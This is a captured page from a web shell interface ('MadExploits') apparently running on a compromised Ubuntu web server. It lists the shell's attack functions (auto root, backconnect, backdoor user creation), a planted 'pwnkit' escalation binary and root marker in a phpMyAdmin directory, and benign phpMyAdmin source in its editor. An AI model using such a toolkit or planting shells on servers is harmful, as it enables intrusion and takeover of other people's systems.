Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.14.134.62
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
src /
Setup /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
ConfigGenerator.php
5.53
KB
-rw-r--r--
FormProcessing.php
2.5
KB
-rw-r--r--
Index.php
4.99
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FormProcessing.php
<?php /** * Formset processing library */ declare(strict_types=1); namespace PhpMyAdmin\Setup; use Fig\Http\Message\StatusCodeInterface; use PhpMyAdmin\Config\FormDisplay; use PhpMyAdmin\ResponseRenderer; use PhpMyAdmin\Template; use PhpMyAdmin\Url; use function in_array; use function is_numeric; use function is_string; /** * PhpMyAdmin\Setup\FormProcessing class */ class FormProcessing { /** * Processes forms registered in $form_display, handles error correction * * @param FormDisplay $formDisplay Form to display */ public static function process(FormDisplay $formDisplay): void { if (isset($_GET['mode']) && $_GET['mode'] === 'revert') { // revert erroneous fields to their default values $formDisplay->fixErrors(); $response = ResponseRenderer::getInstance(); $response->disable(); $response->addHeader('Location', '../setup/index.php' . Url::getCommonRaw(['route' => '/setup'])); $response->setStatusCode(StatusCodeInterface::STATUS_SEE_OTHER); $response->callExit(); } if (! $formDisplay->process(false)) { // handle form view and failed POST echo $formDisplay->getDisplay(); return; } // check for form errors if (! $formDisplay->hasErrors()) { $response = ResponseRenderer::getInstance(); $response->disable(); $response->addHeader('Location', '../setup/index.php' . Url::getCommonRaw(['route' => '/setup'])); $response->setStatusCode(StatusCodeInterface::STATUS_SEE_OTHER); $response->callExit(); } // form has errors, show warning $page = 'index'; if (isset($_GET['page']) && in_array($_GET['page'], ['form', 'config', 'servers'], true)) { $page = $_GET['page']; } $formset = isset($_GET['formset']) && is_string($_GET['formset']) ? $_GET['formset'] : ''; $formId = isset($_GET['id']) && is_numeric($_GET['id']) && (int) $_GET['id'] >= 1 ? (int) $_GET['id'] : 0; if ($formId === 0 && $page === 'servers') { // we've just added a new server, get its id $formId = $formDisplay->getConfigFile()->getServerCount(); } $urlParams = ['page' => $page, 'formset' => $formset, 'id' => $formId]; $template = new Template(); echo $template->render('setup/error', ['url_params' => $urlParams, 'errors' => $formDisplay->displayErrors()]); } }
Close